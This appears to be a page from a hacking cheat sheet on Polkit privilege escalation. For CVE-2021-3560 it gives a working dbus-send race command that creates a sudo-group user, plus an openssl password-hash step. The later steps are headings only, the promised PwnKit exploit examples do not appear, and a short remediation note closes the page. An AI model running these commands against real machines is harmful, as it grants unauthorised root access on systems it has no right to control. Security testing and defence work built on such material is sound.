search
Page cover

PolKit Privilege Escalation

Polkit (PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones.

hashtag
CVE-2021-3560arrow-up-right

hashtag
1. Send a dbus message to create a new userarrow-up-right

Create a new user by sending a dbus message.

# string:tester: The new user named "tester".
# string:"Tester Account": The description of the new user.
# int32:1: sudo group
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:tester string:"Tester Account" int32:1 & sleep 0.005s; kill $!
Copied!

Then check the new user ID (uid).

id tester

uid=1000(tester) gid=1000(tester) groups=1000(tester),27(sudo)
Copied!

hashtag
2. Generate a new password hasharrow-up-right

# -6: SHA512
openssl passwd -6 password123
Copied!

Copy the output hash.

hashtag
3. Send a dbus message to set a new passwordarrow-up-right

hashtag
4. Switch the new userarrow-up-right

Enter the password you created e.g. “password123”. Now change to root .

hashtag
CVE-2021-4034 (PwnKit)arrow-up-right

PwnKit is vulnerability of Polkit to local privilege escalation. There are many exploits available. Below are examples:

hashtag
Remediationsarrow-up-right

To avoid the vulnerability, unset setuid from the pkexec executable.

Or simply upgrade the apt packages in most of distributions which are patched for the vulnerability.

hashtag
References

PreviousPip Download Code ExecutionNextPython Eval Code Execution

Last updated